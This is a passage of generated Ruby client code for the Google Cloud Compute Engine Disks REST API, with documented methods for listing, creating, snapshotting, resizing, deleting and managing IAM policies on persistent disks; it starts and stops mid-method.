# @overload add_resource_policies(disk: nil, disks_add_resource_policies_request_resource: nil, project: nil, request_id: nil, zone: nil)
# Pass arguments to `add_resource_policies` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param disk [::String]
# The disk name for this request.
# @param disks_add_resource_policies_request_resource [::Google::Cloud::Compute::V1::DisksAddResourcePoliciesRequest, ::Hash]
# The body resource for this request
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def add_resource_policies request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::AddResourcePoliciesDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_add_resource_policies request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Retrieves an aggregated list of persistent disks.
#
# @overload aggregated_list(request, options = nil)
# Pass arguments to `aggregated_list` via a request object, either of type
# {::Google::Cloud::Compute::V1::AggregatedListDisksRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::AggregatedListDisksRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload aggregated_list(filter: nil, include_all_scopes: nil, max_results: nil, order_by: nil, page_token: nil, project: nil, return_partial_success: nil)
# Pass arguments to `aggregated_list` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param filter [::String]
# A filter expression that filters resources listed in the response. The expression must specify the field name, a comparison operator, and the value that you want to use for filtering. The value must be a string, a number, or a boolean. The comparison operator must be either `=`, `!=`, `>`, or `<`.
#
# For example, if you are filtering Compute Engine instances, you can exclude instances named `example-instance` by specifying `name != example-instance`.
#
# You can also filter nested fields. For example, you could specify `scheduling.automaticRestart = false` to include instances only if they are not scheduled for automatic restarts. You can use filtering on nested fields to filter based on resource labels.
#
# To filter on multiple expressions, provide each separate expression within parentheses. For example: ``` (scheduling.automaticRestart = true) (cpuPlatform = "Intel Skylake") ``` By default, each expression is an `AND` expression. However, you can include `AND` and `OR` expressions explicitly. For example: ``` (cpuPlatform = "Intel Skylake") OR (cpuPlatform = "Intel Broadwell") AND (scheduling.automaticRestart = true) ```
# @param include_all_scopes [::Boolean]
# Indicates whether every visible scope for each scope type (zone, region, global) should be included in the response. For new resource types added after this field, the flag has no effect as new resource types will always include every visible scope for each scope type in response. For resource types which predate this field, if this flag is omitted or false, only scopes of the scope types where the resource type is expected to be found will be included.
# @param max_results [::Integer]
# The maximum number of results per page that should be returned. If the number of available results is larger than `maxResults`, Compute Engine returns a `nextPageToken` that can be used to get the next page of results in subsequent list requests. Acceptable values are `0` to `500`, inclusive. (Default: `500`)
# @param order_by [::String]
# Sorts list results by a certain order. By default, results are returned in alphanumerical order based on the resource name.
#
# You can also sort results in descending order based on the creation timestamp using `orderBy="creationTimestamp desc"`. This sorts results based on the `creationTimestamp` field in reverse chronological order (newest result first). Use this to sort resources like operations so that the newest operation is returned first.
#
# Currently, only sorting by `name` or `creationTimestamp desc` is supported.
# @param page_token [::String]
# Specifies a page token to use. Set `pageToken` to the `nextPageToken` returned by a previous list request to get the next page of results.
# @param project [::String]
# Project ID for this request.
# @param return_partial_success [::Boolean]
# Opt-in for partial success behavior which provides partial results in case of failure. The default value is false and the logic is the same as today.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::DiskAggregatedList]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::DiskAggregatedList]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def aggregated_list request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::AggregatedListDisksRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, query_string_params = transcode_aggregated_list request
response = @client_stub.make_get_request(
uri: uri,
params: query_string_params,
options: options
)
result = ::Google::Cloud::Compute::V1::DiskAggregatedList.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Creates a snapshot of a specified persistent disk.
#
# @overload create_snapshot(request, options = nil)
# Pass arguments to `create_snapshot` via a request object, either of type
# {::Google::Cloud::Compute::V1::CreateSnapshotDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::CreateSnapshotDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload create_snapshot(disk: nil, guest_flush: nil, project: nil, request_id: nil, snapshot_resource: nil, zone: nil)
# Pass arguments to `create_snapshot` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param disk [::String]
# Name of the persistent disk to snapshot.
# @param guest_flush [::Boolean]
# [Input Only] Whether to attempt an application consistent snapshot by informing the OS to prepare for the snapshot process. Currently only supported on Windows instances using the Volume Shadow Copy Service (VSS).
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param snapshot_resource [::Google::Cloud::Compute::V1::Snapshot, ::Hash]
# The body resource for this request
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def create_snapshot request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::CreateSnapshotDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_create_snapshot request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Deletes the specified persistent disk. Deleting a disk removes its data permanently and is irreversible. However, deleting a disk does not delete any snapshots previously made from the disk. You must separately delete snapshots.
#
# @overload delete(request, options = nil)
# Pass arguments to `delete` via a request object, either of type
# {::Google::Cloud::Compute::V1::DeleteDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::DeleteDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload delete(disk: nil, project: nil, request_id: nil, zone: nil)
# Pass arguments to `delete` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param disk [::String]
# Name of the persistent disk to delete.
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def delete request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::DeleteDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, query_string_params = transcode_delete request
response = @client_stub.make_delete_request(
uri: uri,
params: query_string_params,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Returns a specified persistent disk. Gets a list of available persistent disks by making a list() request.
#
# @overload get(request, options = nil)
# Pass arguments to `get` via a request object, either of type
# {::Google::Cloud::Compute::V1::GetDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::GetDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload get(disk: nil, project: nil, zone: nil)
# Pass arguments to `get` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param disk [::String]
# Name of the persistent disk to return.
# @param project [::String]
# Project ID for this request.
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Disk]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Disk]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def get request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::GetDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, _query_string_params = transcode_get request
response = @client_stub.make_get_request(
uri: uri,
options: options
)
result = ::Google::Cloud::Compute::V1::Disk.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Gets the access control policy for a resource. May be empty if no such policy or resource exists.
#
# @overload get_iam_policy(request, options = nil)
# Pass arguments to `get_iam_policy` via a request object, either of type
# {::Google::Cloud::Compute::V1::GetIamPolicyDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::GetIamPolicyDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload get_iam_policy(options_requested_policy_version: nil, project: nil, resource: nil, zone: nil)
# Pass arguments to `get_iam_policy` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param options_requested_policy_version [::Integer]
# Requested IAM Policy version.
# @param project [::String]
# Project ID for this request.
# @param resource [::String]
# Name or id of the resource for this request.
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Policy]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Policy]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def get_iam_policy request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::GetIamPolicyDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, query_string_params = transcode_get_iam_policy request
response = @client_stub.make_get_request(
uri: uri,
params: query_string_params,
options: options
)
result = ::Google::Cloud::Compute::V1::Policy.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Creates a persistent disk in the specified project using the data in the request. You can create a disk from a source (sourceImage, sourceSnapshot, or sourceDisk) or create an empty 500 GB data disk by omitting all properties. You can also create a disk that is larger than the default size by specifying the sizeGb property.
#
# @overload insert(request, options = nil)
# Pass arguments to `insert` via a request object, either of type
# {::Google::Cloud::Compute::V1::InsertDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::InsertDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload insert(disk_resource: nil, project: nil, request_id: nil, source_image: nil, zone: nil)
# Pass arguments to `insert` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param disk_resource [::Google::Cloud::Compute::V1::Disk, ::Hash]
# The body resource for this request
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param source_image [::String]
# Optional. Source image to restore onto a disk.
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def insert request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::InsertDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_insert request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Retrieves a list of persistent disks contained within the specified zone.
#
# @overload list(request, options = nil)
# Pass arguments to `list` via a request object, either of type
# {::Google::Cloud::Compute::V1::ListDisksRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::ListDisksRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload list(filter: nil, max_results: nil, order_by: nil, page_token: nil, project: nil, return_partial_success: nil, zone: nil)
# Pass arguments to `list` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param filter [::String]
# A filter expression that filters resources listed in the response. The expression must specify the field name, a comparison operator, and the value that you want to use for filtering. The value must be a string, a number, or a boolean. The comparison operator must be either `=`, `!=`, `>`, or `<`.
#
# For example, if you are filtering Compute Engine instances, you can exclude instances named `example-instance` by specifying `name != example-instance`.
#
# You can also filter nested fields. For example, you could specify `scheduling.automaticRestart = false` to include instances only if they are not scheduled for automatic restarts. You can use filtering on nested fields to filter based on resource labels.
#
# To filter on multiple expressions, provide each separate expression within parentheses. For example: ``` (scheduling.automaticRestart = true) (cpuPlatform = "Intel Skylake") ``` By default, each expression is an `AND` expression. However, you can include `AND` and `OR` expressions explicitly. For example: ``` (cpuPlatform = "Intel Skylake") OR (cpuPlatform = "Intel Broadwell") AND (scheduling.automaticRestart = true) ```
# @param max_results [::Integer]
# The maximum number of results per page that should be returned. If the number of available results is larger than `maxResults`, Compute Engine returns a `nextPageToken` that can be used to get the next page of results in subsequent list requests. Acceptable values are `0` to `500`, inclusive. (Default: `500`)
# @param order_by [::String]
# Sorts list results by a certain order. By default, results are returned in alphanumerical order based on the resource name.
#
# You can also sort results in descending order based on the creation timestamp using `orderBy="creationTimestamp desc"`. This sorts results based on the `creationTimestamp` field in reverse chronological order (newest result first). Use this to sort resources like operations so that the newest operation is returned first.
#
# Currently, only sorting by `name` or `creationTimestamp desc` is supported.
# @param page_token [::String]
# Specifies a page token to use. Set `pageToken` to the `nextPageToken` returned by a previous list request to get the next page of results.
# @param project [::String]
# Project ID for this request.
# @param return_partial_success [::Boolean]
# Opt-in for partial success behavior which provides partial results in case of failure. The default value is false and the logic is the same as today.
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::DiskList]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::DiskList]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def list request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::ListDisksRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, query_string_params = transcode_list request
response = @client_stub.make_get_request(
uri: uri,
params: query_string_params,
options: options
)
result = ::Google::Cloud::Compute::V1::DiskList.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Removes resource policies from a disk.
#
# @overload remove_resource_policies(request, options = nil)
# Pass arguments to `remove_resource_policies` via a request object, either of type
# {::Google::Cloud::Compute::V1::RemoveResourcePoliciesDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::RemoveResourcePoliciesDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload remove_resource_policies(disk: nil, disks_remove_resource_policies_request_resource: nil, project: nil, request_id: nil, zone: nil)
# Pass arguments to `remove_resource_policies` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param disk [::String]
# The disk name for this request.
# @param disks_remove_resource_policies_request_resource [::Google::Cloud::Compute::V1::DisksRemoveResourcePoliciesRequest, ::Hash]
# The body resource for this request
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def remove_resource_policies request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::RemoveResourcePoliciesDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_remove_resource_policies request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Resizes the specified persistent disk. You can only increase the size of the disk.
#
# @overload resize(request, options = nil)
# Pass arguments to `resize` via a request object, either of type
# {::Google::Cloud::Compute::V1::ResizeDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::ResizeDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload resize(disk: nil, disks_resize_request_resource: nil, project: nil, request_id: nil, zone: nil)
# Pass arguments to `resize` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param disk [::String]
# The name of the persistent disk.
# @param disks_resize_request_resource [::Google::Cloud::Compute::V1::DisksResizeRequest, ::Hash]
# The body resource for this request
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def resize request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::ResizeDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_resize request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Sets the access control policy on the specified resource. Replaces any existing policy.
#
# @overload set_iam_policy(request, options = nil)
# Pass arguments to `set_iam_policy` via a request object, either of type
# {::Google::Cloud::Compute::V1::SetIamPolicyDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::SetIamPolicyDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload set_iam_policy(project: nil, resource: nil, zone: nil, zone_set_policy_request_resource: nil)
# Pass arguments to `set_iam_policy` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param resource [::String]
# Name or id of the resource for this request.
# @param zone [::String]
# The name of the zone for this request.
# @param zone_set_policy_request_resource [::Google::Cloud::Compute::V1::ZoneSetPolicyRequest, ::Hash]
# The body resource for this request
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Policy]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Policy]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def set_iam_policy request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
